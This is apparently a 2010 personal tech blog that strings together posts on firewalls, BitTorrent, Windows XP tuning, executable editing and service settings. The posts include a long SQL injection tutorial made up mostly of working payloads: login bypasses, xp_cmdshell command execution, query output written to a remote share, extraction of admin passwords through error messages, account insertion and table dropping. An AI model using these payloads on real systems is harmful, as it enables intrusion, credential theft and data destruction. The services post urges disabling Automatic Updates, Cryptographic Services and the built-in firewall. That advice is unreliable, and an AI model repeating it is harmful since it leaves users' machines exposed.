Until now we discussed only problems related to lack of appropriate knowledge by the user. Yet, there are other problems regarding personal firewalls. For example, some of them are known to be quite heavy on computer resources, or slow down the communication speed. Different personal firewalls quite vary with regard to that. If you have a new computer with a slow Internet communication (such as regular dial-up networking) then it might not slow down your computer noticeably. Yet, if you use an older computer, and a fast communication, you might find that some personal firewalls will slow down your communication quite drastically. Personal firewalls also vary on how much they are stable.

Advantages of External Firewalls over Personal Firewalls
1. They do not take resources from the computer. This should be clear. This is especially useful when the firewall blocks flooding attacks.
2. It is harder (although in principle still possible) for a Trojan horse to disable it, because it does not reside in the same computer that the Trojan has infected. It is not possible to use the specific communication while totally bypassing the firewall.
3. They can be used without any dependence on the operating system on the computer(s) they defend.
4. No instability problems.

Thursday, September 2, 2010

SQL INJECTION WITH EXAMPLE

1. What is SQL Injection

When a machine has only port 80 opened, your most trusted vulnerability scanner cannot return anything useful, and you know that the admin always patch his server, we have to turn to web hacking. SQL injection is one of type of web hacking that require nothing but port 80 and it might just work even if the admin is patch-happy. It attacks on the web application (like ASP, JSP, PHP, CGI, etc) itself rather than on the web server or services running in the OS.

This will help beginners with grasping the problems facing them while trying to utilize SQL Injection techniques, to successfully utilize them, and to protect themselves from such attacks.
This article does not introduce anything new, SQL injection has been widely written and used in the wild. We wrote the article because we would like to document some of our pen-test using SQL injection and hope that it may be of some use to others. You may find a trick or two but please check out the "11.0 Where can I get more info?" for people who truly deserve credit for developing many techniques in SQL injection.
What do you need for SQL Injection?
Any web browser.

Where to Start SQL Injection?

Try to look for pages that allow you to submit data, i.e: login page, search page, feedback, etc. Sometimes, HTML pages use POST command to send parameters to another ASP page. Therefore, you may not see the parameters in the URL. However, you can check the source code of the HTML, and look for "FORM" tag in the HTML code. You may find something like this in some HTML codes:
<FORM action=Search/search.asp method=post>
<input type=hidden name=A value=C>
</FORM>
Everything between the <FORM> and </FORM> have potential parameters that might be useful (exploit wise).

1. What if you can't find any page that takes input?

You should look for pages like ASP, JSP, CGI, or PHP web pages. Try to look especially for URL that takes parameters, like:
http://duck/index.asp?id=10

2. How do you test if it is vulnerable for SQL Injection?

Start with a single quote trick. Input something like:
hi' or 1=1--
Into login, or password, or even in the URL. Example:
- Login: hi' or 1=1--
- Pass: hi' or 1=1--
- http://duck/index.asp?id=hi' or 1=1--
If you must do this with a hidden field, just download the source HTML from the site, save it in your hard disk, modify the URL and hidden field accordingly. Example:
<FORM action=http://duck/Search/search.asp method=post>
<input type=hidden name=A value="hi' or 1=1--">
</FORM>
If luck is on your side, you will get login without any login name or password.

3. But why ' or 1=1-- is important in SQL Injection?

Let us look at another example why ' or 1=1-- is important. Other than bypassing login, it is also possible to view extra information that is not normally available. Take an asp page that will link you to another page with the following URL:
http://duck/index.asp?category=food
In the URL, 'category' is the variable name, and 'food' is the value assigned to the variable. In order to do that, an ASP might contain the following code (OK, this is the actual code that we created for this exercise):
v_cat = request("category")
sqlstr="SELECT * FROM product WHERE PCategory='" & v_cat & "'"
set rs=conn.execute(sqlstr)
As we can see, our variable will be wrapped into v_cat and thus the SQL statement should become:
SELECT * FROM product WHERE PCategory='food'
The query should return a resultset containing one or more rows that match the WHERE condition, in this case, 'food'. Now, assume that we change the URL into something like this:
http://duck/index.asp?category=food' or 1=1--
Now, our variable v_cat equals to "food' or 1=1-- ", if we substitute this in the SQL query, we will have:
SELECT * FROM product WHERE PCategory='food' or 1=1--'
The query now should now select everything from the product table regardless if PCategory is equal to 'food' or not. A double dash "--" tell MS SQL server ignore the rest of the query, which will get rid of the last hanging single quote ('). Sometimes, it may be possible to replace double dash with single hash "#".
However, if it is not an SQL server, or you simply cannot ignore the rest of the query, you also may try
' or 'a'='a
The SQL query will now become:
SELECT * FROM product WHERE PCategory='food' or 'a'='a'
It should return the same result.
Depending on the actual SQL query, you may have to try some of these possibilities:
' or 1=1--
" or 1=1--
or 1=1--
' or 'a'='a
" or "a"="a
') or ('a'='a

4. How do I get remote execution with SQL injection?

Being able to inject SQL command usually mean, we can execute any SQL query at will. Default installation of MS SQL Server is running as SYSTEM, which is equivalent to Administrator access in Windows. We can use stored procedures like master..xp_cmdshell to perform remote execution:
'; exec master..xp_cmdshell 'ping 10.10.1.2'--
Try using double quote (") if single quote (') is not working. The semi colon will end the current SQL query and thus allow you to start a new SQL command. To verify that the command executed successfully, you can listen to ICMP packet from 10.10.1.2, check if there is any packet from the server:
#tcpdump icmp
If you do not get any ping request from the server, and get error message indicating permission error, it is possible that the administrator has limited Web User access to these stored procedures.

5 How to get output of my SQL query by SQL Injection?

It is possible to use sp_makewebtask to write your query into an HTML:
'; EXEC master..sp_makewebtask "\\10.10.1.3\share\output.html", "SELECT * FROM INFORMATION_SCHEMA.TABLES"
But the target IP must folder "share" sharing for Everyone.

6 How to get data from the database using ODBC error message by SQL Injection?

We can use information from error message produced by the MS SQL Server to get almost any data we want. Take the following page for example:
http://duck/index.asp?id=10
We will try to UNION the integer '10' with another string from the database:
http://duck/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--
The system table INFORMATION_SCHEMA.TABLES contains information of all tables in the server. The TABLE_NAME field obviously contains the name of each table in the database. It was chosen because we know it always exists. Our query:
SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES-
This should return the first table name in the database. When we UNION this string value to an integer 10, MS SQL Server will try to convert a string (nvarchar) to an integer. This will produce an error, since we cannot convert nvarchar to int. The server will display the following error:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'table1' to a column of data type int.
/index.asp, line 5
The error message is nice enough to tell us the value that cannot be converted into an integer. In this case, we have obtained the first table name in the database, which is "table1".
To get the next table name, we can use the following query:
http://duck/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME NOT IN ('table1')--
We also can search for data using LIKE keyword:
http://duck/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME LIKE '%25login%25'--
Output:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'admin_login' to a column of data type int.
/index.asp, line 5
The matching patent, '%25login%25' will be seen as %login% in SQL Server. In this case, we will get the first table name that matches the criteria, "admin_login".

7. How to mine all column names of a table by SQL Injection?

We can use another useful table INFORMATION_SCHEMA.COLUMNS to map out all columns name of a table:
http://duck/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login'--
Output:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'login_id' to a column of data type int.
/index.asp, line 5
Now that we have the first column name, we can use NOT IN () to get the next column name:
http://duck/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login' WHERE COLUMN_NAME NOT IN ('login_id')--
Output:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'login_name' to a column of data type int.
/index.asp, line 5
When we continue further, we obtained the rest of the column name, i.e. "password", "details". We know this when we get the following error message:
http://duck/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login' WHERE COLUMN_NAME NOT IN ('login_id','login_name','password',details')--
Output:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]ORDER BY items must appear in the select list if the statement contains a UNION operator.
/index.asp, line 5
8. How to retrieve any data we want?
Now that we have identified some important tables, and their column, we can use the same technique to gather any information we want from the database.
Now, let's get the first login_name from the "admin_login" table:
http://duck/index.asp?id=10 UNION SELECT TOP 1 login_name FROM admin_login--
Output:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'neo' to a column of data type int.
/index.asp, line 5
We now know there is an admin user with the login name of "neo". Finally, to get the password of "neo" from the database:
http://duck/index.asp?id=10 UNION SELECT TOP 1 password FROM admin_login where login_name='neo'--
Output:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'm4trix' to a column of data type int.
/index.asp, line 5
We can now login as "neo" with his password "m4trix".

9. How to get numeric string value?

There is limitation with the technique describe above. We cannot get any error message if we are trying to convert text that consists of valid number (character between 0-9 only). Let say we are trying to get password of "trinity" which is "31173":
http://duck/index.asp?id=10 UNION SELECT TOP 1 password FROM admin_login where login_name='trinity'--
We will probably get a "Page Not Found" error. The reason being, the password "31173" will be converted into a number, before UNION with an integer (10 in this case). Since it is a valid UNION statement, SQL server will not throw ODBC error message, and thus, we will not be able to retrieve any numeric entry.
To solve this problem, we can append the numeric string with some alphabets to make sure the conversion fail. Let us try this query instead:
http://duck/index.asp?id=10 UNION SELECT TOP 1 convert(int, password%2b'%20morpheus') FROM admin_login where login_name='trinity'--
We simply use a plus sign (+) to append the password with any text we want. (ASSCII code for '+' = 0x2b). We will append '(space)morpheus' into the actual password. Therefore, even if we have a numeric string '31173', it will become '31173 morpheus'. By manually calling the convert() function, trying to convert '31173 morpheus' into an integer, SQL Server will throw out ODBC error message:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value '31173 morpheus' to a column of data type int.
/index.asp, line 5
Now, you can even login as 'trinity' with the password '31173'.

10. How to update/insert data into the database by SQL Injection?

When we successfully gather all column name of a table, it is possible for us to UPDATE or even INSERT a new record in the table. For example, to change password for "neo":
http://duck/index.asp?id=10; UPDATE 'admin_login' SET 'password' = 'newpas5' WHERE login_name='neo'--
To INSERT a new record into the database:
http://duck/index.asp?id=10; INSERT INTO 'admin_login' ('login_id', 'login_name', 'password', 'details') VALUES (666,'neo2','newpas5','NA')--
We can now login as "neo2" with the password of "newpas5".

WHAT IS SQL INJECTION

SQL Injection the most popular method to pass SQL command deliberately from input filed in application. As a developer you should know how to prevent your application from SQL Injection.
SQL Injection is one of the many web attack mechanisms used by hackers to steal data from organizations. It is perhaps one of the most common application layer attack techniques used today. It is the type of attack that takes advantage of improper coding of your web applications that allows hacker to inject SQL commands into say a login form to allow them to gain access to the data held within your database.

Which part of your application is in threat for SQL Injection?
SQL Injection is the hacking technique which attempts to pass SQL commands and SQL queries (statements) through a web application or desktop application for execution by the backend database. If not sanitized properly, web applications may result in SQL Injection attacks that allow hackers to view information from the database and/or even wipe it out.
Such features as login pages, support and product request forms, feedback forms, search pages, shopping carts and the general delivery of dynamic content, shape modern websites and provide businesses with the means necessary to communicate with prospects and customers. These website features are all examples of web applications which may be either purchased off-the-shelf or developed as bespoke programs.
These website features are all susceptible to SQL Injection attacks which arise because the fields available for user input allow SQL statements to pass through and query the database directly.
Basic SQL Injection, power of 'T'='T'
Most login page is ask for User Name and Password from the user. User type the user name and password in the login form and submit for authenticate. System query the database with supplied user name and password if it found in the database it authenticate the user otherwise it show login fail message. When we submit the login page most login page will pass query to database like.

    select * from user_master where user_name='" & TxtUserName.Text & "' and
    user_password ='" & TxtPassword.Text & "'"

If we type User Name as ANYUSER and Password as ANYPASS then actual query look like.

    select * from user_master where user_name='ANYUSER' and
    user_password ='ANYPASS'

It will not work as there is no such user name and password in the table user_master. and it will show login fail message. Now just change your password and type ANYPASS' or 'T' = 'T and submit the page again. This time the query look like.

    select * from user_master where user_name='ANYUSER' and
    user_password ='ANYPASS' or 'T' = 'T'

Now it works and you are able to login the page without knowing the user name and password. How it was happen. the query will always return all records from the database because 'T' = 'T' always True.

What are the SQL command you can pass
If the underlying database supports multiple command in single line, then you can pass any valid DML, DCL and DDL command through SQL injection. for example following command will drop user_master table from the database. For example type in password box ANYPASS' ; drop table user_master -- and submit the page again. this time underlying query looks like.

    select * from user_master where user_name='ANYUSER' and
    user_password ='ANYPASS' ; drop table user_master -- '

Now it drop the user_master table from the database. In this case we pass drop table command along with password. -- two dash is comment for SQL no other code will be executed after that. If you know the table structure then you can Insert and update the record as well through SQL Injection.

Monday, August 16, 2010

HOW TO DOWNLOAD FILES BY TORRNT BITTORRENT

Bit Torrent Tutorials

Added | Name | Filesize | Seeds | DLs (and a few more which aren't very useful.)

It's always best to download using a torrent that has a decent amount of seeders and downloaders, this way you can be assured there's a good chance your download will finish. The more the better.

Install Java JRE before you do ANYTHING.

Load up Azureus, and if you want, go through the settings and personalize it.

After your download has finished, be nice, and leave the torrent transferring. So people can get pieces of the file from you, just as you got pieces from other people.

Alternatively, if you don't want to use the plugin... you can just head to suprnova.org and download files to any folder. Then go to File > Open > .torrent File in Azureus.

This should about wrap it up for the Bit Torrent Tutorial. If you guys think of anything I should add, or whatnot, just let me know and I'll check into it.

Sunday, August 1, 2010

HOW TO SPEED UP YOUR PC SUGGESTIONS BY EXPERT

Since defragging the disk won't do much to improve Windows XP performance, here are 23 suggestions that will. Each can enhance the performance and reliability of your customers' PCs. Best of all, most of them will cost you nothing.

1.) To decrease a system's boot time and increase system performance, use the money you save by not buying defragmentation software -- the built-in Windows defragmenter works just fine -- and instead equip the computer with an Ultra-133 or Serial ATA hard drive with 8-MB cache buffer.

2.) If a PC has less than 512 MB of RAM, add more memory. This is a relatively inexpensive and easy upgrade that can dramatically improve system performance.

3.) Ensure that Windows XP is utilizing the NTFS file system. If you're not sure, here's how to check: First, double-click the My Computer icon, right-click on the C: Drive, then select Properties. Next, examine the File System type; if it says FAT32, then back-up any important data. Next, click Start, click Run, type CMD, and then click OK. At the prompt, type CONVERT C: /FS:NTFS and press the Enter key. This process may take a while; it's important that the computer be uninterrupted and virus-free. The file system used by the bootable drive will be either FAT32 or NTFS. I highly recommend NTFS for its superior security, reliability, and efficiency with larger disk drives.

4.) Disable file indexing. The indexing service extracts information from documents and other files on the hard drive and creates a "searchable keyword index." As you can imagine, this process can be quite taxing on any system.

The idea is that the user can search for a word, phrase, or property inside a document, should they have hundreds or thousands of documents and not know the file name of the document they want. Windows XP's built-in search functionality can still perform these kinds of searches without the Indexing service. It just takes longer. The OS has to open each file at the time of the request to help find what the user is looking for.

Most people never need this feature of search. Those who do are typically in a large corporate environment where thousands of documents are located on at least one server. But if you're a typical system builder, most of your clients are small and medium businesses. And if your clients have no need for this search feature, I recommend disabling it.

Here's how: First, double-click the My Computer icon. Next, right-click on the C: Drive, then select Properties. Uncheck "Allow Indexing Service to index this disk for fast file searching." Next, apply changes to "C: subfolders and files," and click OK. If a warning or error message appears (such as "Access is denied"), click the Ignore All button.

5.) Update the PC's video and motherboard chipset drivers. Also, update and configure the BIOS. For more information on how to configure your BIOS properly, see this article on my site.

6.) Empty the Windows Prefetch folder every three months or so. Windows XP can "prefetch" portions of data and applications that are used frequently. This makes processes appear to load faster when called upon by the user. That's fine. But over time, the prefetch folder may become overloaded with references to files and applications no longer in use. When that happens, Windows XP is wasting time, and slowing system performance, by pre-loading them. Nothing critical is in this folder, and the entire contents are safe to delete.

7.) Once a month, run a disk cleanup. Here's how: Double-click the My Computer icon. Then right-click on the C: drive and select Properties. Click the Disk Cleanup button -- it's just to the right of the Capacity pie graph -- and delete all temporary files.

8.) In your Device Manager, double-click on the IDE ATA/ATAPI Controllers device, and ensure that DMA is enabled for each drive you have connected to the Primary and Secondary controller. Do this by double-clicking on Primary IDE Channel. Then click the Advanced Settings tab. Ensure the Transfer Mode is set to "DMA if available" for both Device 0 and Device 1. Then repeat this process with the Secondary IDE Channel.

9.) Upgrade the cabling. As hard-drive technology improves, the cabling requirements to achieve these performance boosts have become more stringent. Be sure to use 80-wire Ultra-133 cables on all of your IDE devices with the connectors properly assigned to the matching Master/Slave/Motherboard sockets. A single device must be at the end of the cable; connecting a single drive to the middle connector on a ribbon cable will cause signaling problems. With Ultra DMA hard drives, these signaling problems will prevent the drive from performing at its maximum potential. Also, because these cables inherently support "cable select," the location of each drive on the cable is important. For these reasons, the cable is designed so drive positioning is explicitly clear.

10.) Remove all spyware from the computer. Use free programs such as AdAware by Lavasoft or SpyBot Search & Destroy. Once these programs are installed, be sure to check for and download any updates before starting your search. Anything either program finds can be safely removed. Any free software that requires spyware to run will no longer function once the spyware portion has been removed; if your customer really wants the program even though it contains spyware, simply reinstall it. For more information on removing Spyware visit this Web Pro News page.

11.) Remove any unnecessary programs and/or items from Windows Startup routine using the MSCONFIG utility. Here's how: First, click Start, click Run, type MSCONFIG, and click OK. Click the StartUp tab, then uncheck any items you don't want to start when Windows starts. Unsure what some items are? Visit the WinTasks Process Library. It contains known system processes, applications, as well as spyware references and explanations. Or quickly identify them by searching for the filenames using Google or another Web search engine.

12.) Remove any unnecessary or unused programs from the Add/Remove Programs section of the Control Panel.

13.) Turn off any and all unnecessary animations, and disable active desktop. In fact, for optimal performance, turn off all animations. Windows XP offers many different settings in this area. Here's how to do it: First click on the System icon in the Control Panel. Next, click on the Advanced tab. Select the Settings button located under Performance. Feel free to play around with the options offered here, as nothing you can change will alter the reliability of the computer -- only its responsiveness.

14.) If your customer is an advanced user who is comfortable editing their registry, try some of the performance registry tweaks offered at Tweak XP.

15.) Visit Microsoft's Windows update site regularly, and download all updates labeled Critical. Download any optional updates at your discretion.

16.) Update the customer's anti-virus software on a weekly, even daily, basis. Make sure they have only one anti-virus software package installed. Mixing anti-virus software is a sure way to spell disaster for performance and reliability.

17.) Make sure the customer has fewer than 500 type fonts installed on their computer. The more fonts they have, the slower the system will become. While Windows XP handles fonts much more efficiently than did the previous versions of Windows, too many fonts -- that is, anything over 500 -- will noticeably tax the system.

18.) Do not partition the hard drive. Windows XP's NTFS file system runs more efficiently on one large partition. The data is no safer on a separate partition, and a reformat is never necessary to reinstall an operating system. The same excuses people offer for using partitions apply to using a folder instead. For example, instead of putting all your data on the D: drive, put it in a folder called "D drive." You'll achieve the same organizational benefits that a separate partition offers, but without the degradation in system performance. Also, your free space won't be limited by the size of the partition; instead, it will be limited by the size of the entire hard drive. This means you won't need to resize any partitions, ever. That task can be time-consuming and also can result in lost data.

19.) Check the system's RAM to ensure it is operating properly. I recommend using a free program called MemTest86. The download will make a bootable CD or diskette (your choice), which will run 10 extensive tests on the PC's memory automatically after you boot to the disk you created. Allow all tests to run until at least three passes of the 10 tests are completed. If the program encounters any errors, turn off and unplug the computer, remove a stick of memory (assuming you have more than one), and run the test again. Remember, bad memory cannot be repaired, but only replaced.

20.) If the PC has a CD or DVD recorder, check the drive manufacturer's Web site for updated firmware. In some cases you'll be able to upgrade the recorder to a faster speed. Best of all, it's free.

21.) Disable unnecessary services. Windows XP loads a lot of services that your customer most likely does not need. To determine which services you can disable for your client, visit the Black Viper site for Windows XP configurations.

22.) If you're sick of a single Windows Explorer window crashing and then taking the rest of your OS down with it, then follow this tip: open My Computer, click on Tools, then Folder Options. Now click on the View tab. Scroll down to "Launch folder windows in a separate process," and enable this option. You'll have to reboot your machine for this option to take effect.

23.) At least once a year, open the computer's cases and blow out all the dust and debris. While you're in there, check that all the fans are turning properly. Also inspect the motherboard capacitors for bulging or leaks. For more information on this leaking-capacitor phenomena, you can read numerous articles on my site.

Following any of these suggestions should result in noticeable improvements to the performance and reliability of your customers' computers. If you still want to defrag a disk, remember that the main benefit will be to make your data more retrievable in the event of a crashed drive.

Sunday, July 11, 2010

How to modify *.exe files

learn how to change *.exe files, in 5 easy steps:

1) Don't try to modify a prog by editing his source in a dissasembler.Why?
Cause that's for programmers and assembly experts only.

try to view it in hex you'll only get tons of crap you don't understand.
First off, you need Resource Hacker(last version). It's a resource editor-
very easy to use, You can download it at h**p://www.users.on.net/johnson/resourcehacker/

2) Unzip the archive, and run ResHacker.exe. You can check out the help file too

3) You will see that the interface is simple and clean. Go to the menu FileOpen or press Ctrl+O to open a file. Browse your way to the file you would like to edit. You can edit *.exe, *.dll, *.ocx, *.scr and *.cpl files, but this tutorial is to teach you how to edit *.exe files, so open one.

4) In the left side of the screen a list of sections will appear.
The most common sections are
-String table;
-RCData;
-Dialog;
-Cursor group;
-Bitmap;
-WAV.
*Icon: You can wiew and change the icon(s) of the program by double-clicking the icon section,chossing the icon, right-clicking on it an pressing "replace resource". After that you can choose the icon you want to replace the original with.
*String table: a bunch of crap, useful sometimes, basic programming knowladge needed.
*RCData: Here the real hacking begins. Modify window titles, buttons, text, and lots more!
*Dialog:Here you can modify the messages or dialogs that appear in a program. Don't forget to press "Compile" when you're done!
*Cursor group: Change the mouse cursors used in the program just like you would change the icon.
*Bitmap: View or change images in the programs easy!
*WAV:Change the sounds in the prog. with your own.

5) In the RCData,Dialog,Menu and String table sections you can do a lot of changes. You can modify or translate the text change links, change buttons, etc.

TIP: To change a window title, search for something like: CAPTION "edit this".
TIP: After all operations press the "Compile Script" button, and when you're done editing save, your work @ FileSave(Save as).
TIP: When you save a file,the original file will be backed up by default and renamed to Name_original and the saved file will have the normal name of the changed prog.
TIP: Sometimes you may get a message like: "This program has a non-standard resource layout... it has probably been compressed with an .EXE compressor." That means that Resource Hacker can't modify it because of it's structure.

Sunday, July 4, 2010

HOW TO STOP UNNECESSARY SERVICES IN WIN XP

Turning off unnecessary services in Windows XP can greatly reduce your exploit risk, while improving system performance. It's a good time to inject that often there are all sorts of "download optimizers" and other cute programs that vendors like to push on users. Most of the time, installing such things slows your computer down at best. It could subject you to potential security risks. The first rule is "If you don't know you need it, you probably don't."

Unnecessary services don't just subject you to security risk. They also slow down the operation of your computer. So, don't get lazy here and think you can just deal with the infections later. Go ahead and turn that junk off and recapture your system from these resource hogs. You get to services by going to Control Panel, Administrative Tools, then Services. You should see a long list of services, some running and some dormant. Use this checklist to help determine which services you can live without.

If you don't know how to find Windows Services in Windows XP, click on Start, Control Panel, Administrative Tools, and Services. Below is a simple step by step to finding and changing your services on Windows XP. Keep in mind that your view settings may make your's appear slightly different, but will be the same basic path.

Click on Start then Control Panel
Click on start, then click on Control Panel.

In Control Panel, click on Administrative Tools

In Administrative Tools, click on Services.

Choose the Service to Modify
Choose the service you wish to modify.

Changing the Service Settings

Once you select the service you wish to modify, you have several buttons to turn the service off immediately, drop down choices to disable a service, make it autmatic, or make it manual.

Windows XP Pro (and Home); Stuff to turn off:

Each service is listed as it is in Microsoft's WIndows XP Professional. These should be similar in Microsoft's XP Home as well. Under each is the definition given in the Services Manager.

Alerter
Notifies selected users and computers of administrative alerts. If the service is stopped, programs that use administrative alerts will not receive them. If this service is disabled, any services that explicitly depend on it will fail to start.

Comment: I don't want my personal computer telling me anything, ever. Shut up and work! There's few things I find more annoying than a computer constantly wanting to interact with me while I'm using it to do work or entertain myself. A computer is a tool, not a friend or work companion. No Hal, I don't want to talk to you. Perhaps there's a software vendor that can give you a compelling reason why you need this service, but for most home and SOHO PC use it's just an unnecessary service taking up resources and providing risk. Unless you are running a product that requires this service, disable it.

Updated comment: Someone emailed me to say that if you're on a network where you are required to update your password periodically, failing to do so will generate a notice [if] you have this service enabled. If not, then obviously, your annoying local network won't warn you that you need to change your password and thus you'll get locked out. I've not tested this. But, if you have such a service on your network, you should refer to other admonitions in this article and leave managing your desktop to your IT staff(er). If you're a home network or don't know, read the paragraph above and use personal judgment.
Application Layer Gateway Service
Provides support for 3rd party protocol plug-ins for Internet Connection Sharing and the Internet Connection Firewall

Comment: Do you want to share your internet connection? That's an article waiting to be written. Let me be clear. Since you can buy a router for $50 or less, and Windows does an awful job routing, using a computer to gateway your other computers to the internet is just stupid. "What about firewalling and admission control?" Well, that's not going to be done through the built-in internet sharing tools. So, we''re not talking about that. If you use a personal computer to gateway your other computers to the internet (and calling it a server doesn't change the reality), you are wasting resources. Buy a $50 router, or a $1000 router for that matter. But, buy a discrete device that is designed to do the job. Use hardware based firewalling (OK, it's all based on software - but I mean a boxed solution, not software installed on a PC that's prone to lose autonomy). And, what about all those cute third-party firewalling tools that plug in to this thing? Man, give me a break. If it runs on top of your Windows installation, it's not a real firewall. Unless this is required by a product you think is necessary, disable it.
Automatic Updates
Enables the download and installation of critical Windows updates. If the service is disabled, the operating system can be manually updated.

Comment: There's only two options that may make sense with this service. You should either set it to disable or manual. I'd disable it. Automatic Updates is designed as a tool to aid Microsoft in controlling their product. Props to Microsoft for trying to protect their product from piracy. But, some updates have been known to cause problems. Use it when you need it, and disable it when you don't, unless you're too lazy to do updates on your own. Don't you wonder why all the computers in big, well managed networks don't run Automatic Updates? It's mostly because managers of big networks create their own update policies. If you more completely understand the thinking that goes into deciding whether or not to distribute an update, you could better administer your own PC. Either turn it on and assume the risk, or turn it off and regularly visit Mircosoft's update and news page (discussed more below).
Background Intelligent Transfer Service
Uses idle network bandwidth to transfer data.

Comment: This is one of those tools they require you turn on to enable Automatic Updates. Think about it. It connects your PC to the internet or network and works behind your back to do stuff you didn't explicitly tell it to do. It sounds like a great tool to help hackers collect data from your PC and slowly seep it back to their lair. Unless it's immediately required, disable it. It you use it and then go for some time with no need to use it, disable it. If you can't remember to keep your PC updated with the latest security fixes, you'll need it.
ClipBook
Enables ClipBook Viewer to store information and share it with remote computers. If the service is stopped, ClipBook Viewer will not be able to share information with remote computers. If this service is disabled, any services that explicitly depend on it will fail to start.

Comment: So, you want to copy stuff to your clipbook and allow remote computers to access it? I don't. There may be a software vendor that requires this service to run. I've yet to find it useful. I suggest you disable it.
Computer Browser
Maintains an updated list of computers on the network and supplies this list to computers designated as browsers. If this service is stopped, this list will not be updated or maintained. If this service is disabled, any services that explicitly depend on it will fail to start.

Comment: If you are on a network with other computers, and need to see them, this may be a useful tool. Otherwise, disable it.
Cryptographic Services
Provides three management services: Catalog Database Service, which confirms the signatures of Windows files; Protected Root Service, which adds and removes Trusted Root Certification Authority certificates from this computer; and Key Service, which helps enroll this computer for certificates. If this service is stopped, these management services will not function properly. If this service is disabled, any services that explicitly depend on it will fail to start.

Comment: It is very necessary if you are passing certificates for networking. Unless you are in a large corporate network where connections are managed through authentication, this is unnecessary; disable it.
Distributed Transaction Coordinator
Coordinates transactions that span multiple resource managers, such as databases, message queues, and file systems. If this service is stopped, these transactions will not occur. If this service is disabled, any services that explicitly depend on it will fail to start.

Comment: Extremely few personal computers will require this service. If you use it, you may want to review the reasons it is being used. Unless you are accessing network filesystems and databases, disable it.
DNS Client
Resolves and caches Domain Name System (DNS) names for this computer. If this service is stopped, this computer will not be able to resolve DNS names and locate Active Directory domain controllers. If this service is disabled, any services that explicitly depend on it will fail to start.

Comment: It's typically good to leave this on.
Error Reporting Service
Allows error reporting for services and applications running in non-standard environments.

Comment: Erorr reporting is very useful, if you know what to do with the errors or you are running software that adjusts based on error reporting. This is that annoying "feature" in Windows that constantly pops up wanting to ship information about your software failures to Redmond. People promise me it helps find problems and solutions. I've mostly seen problem reports that you could as easily search out yourself. If you're advanced enough to use this, you'll likely use a search engine just as well. Chances are, the best thing for you to do is disable it.
Help and Support
Enables Help and Support Center to run on this computer. If this service is stopped, Help and Support Center will be unavailable. If this service is disabled, any services that explicitly depend on it will fail to start.

Comment: I don't find this service useful, other than sucking up resources. If you know how to use Google, I'd disable it.
Human Interface Device Access
Enables generic input access to Human Interface Devices (HID), which activates and maintains the use of predefined hot buttons on keyboards, remote controls, and other multimedia devices. If this service is stopped, hot buttons controlled by this service will no longer function. If this service is disabled, any services that explicitly depend on it will fail to start.

Comment: Whether or not you should disable this service, depends on other services you need. If you don't know, turn it off and see if it breaks anything. It says that it deals with hotkeys, however all the system hotkeys that most of us enjoy aren't controlled by this service, they are built into the core OS. Control C, for example, to copy and Control V to past, do not stop working when you turn this service off. It seems this has more to do with specific hotkeys that a software vendor may want to insert into their installed program or internet product. Until you see a reason for it, I'd turn this one off. Personally, I consider relying on such services to be lazy programming. But, there may be good reason for using it if it's more efficient.
Indexing Service
Indexes contents and properties of files on local and remote computers; provides rapid access to files through flexible querying language.

Comment: To date, nobody has shown me real system performance improvements with this technology. Keep in mind, I'm limited in this conversation to Windows. Indexing is very useful. Indexing databases is very useful. Indexing your computer isn't very useful at all. Typically, if you are on a network, you know where on a network to find your chosen data. If you are not on a network, there's no real performance enhancement to this service that justifies the complexity and resource use. Chances are good you should disable it.
IMAPI CD-Burning COM Service
Manages CD recording using Image Mastering Applications Programming Interface (IMAPI). If this service is stopped, this computer will be unable to record CDs. If this service is disabled, any services that explicitly depend on it will fail to start.

Comment: Obviously, there may be some usefulness leaving this service as manual, if you have a CD burner installed. If you don't, disable it.
Internet Connection Firewall (ICF) / Internet Connection Sharing (ICS)
Provides network address translation, addressing, name resolution and/or intrusion prevention services for a home or small office network.

Comment: This tool does a great job of complicating my internet connection and slowing down transactions. It's not likely this tool is sophisticated enough to make a major impact in your system's performance. You should disable it.
Messenger
Transmits net send and Alerter service messages between clients and servers. This service is not related to Windows Messenger. If this service is stopped, Alerter messages will not be transmitted. If this service is disabled, any services that explicitly depend on it will fail to start.

Comment: Turn this thing off! It's a simple kit for anybody that can connect via any network to your computer to access your system and do things you don't want them to. Disable it.
Net Logon
Supports pass-through authentication of account logon events for computers in a domain.

Comment: Unless you need this to operate inside a domain, it's likely not necessary or useful. If you are using a home or SOHO PC and don't have a local domain based network, disable it.
NetMeeting Remote Desktop Sharing
Enables an authorized user to access this computer remotely by using NetMeeting over a corporate intranet. If this service is stopped, remote desktop sharing will be unavailable. If this service is disabled, any services that explicitly depend on it will fail to start.

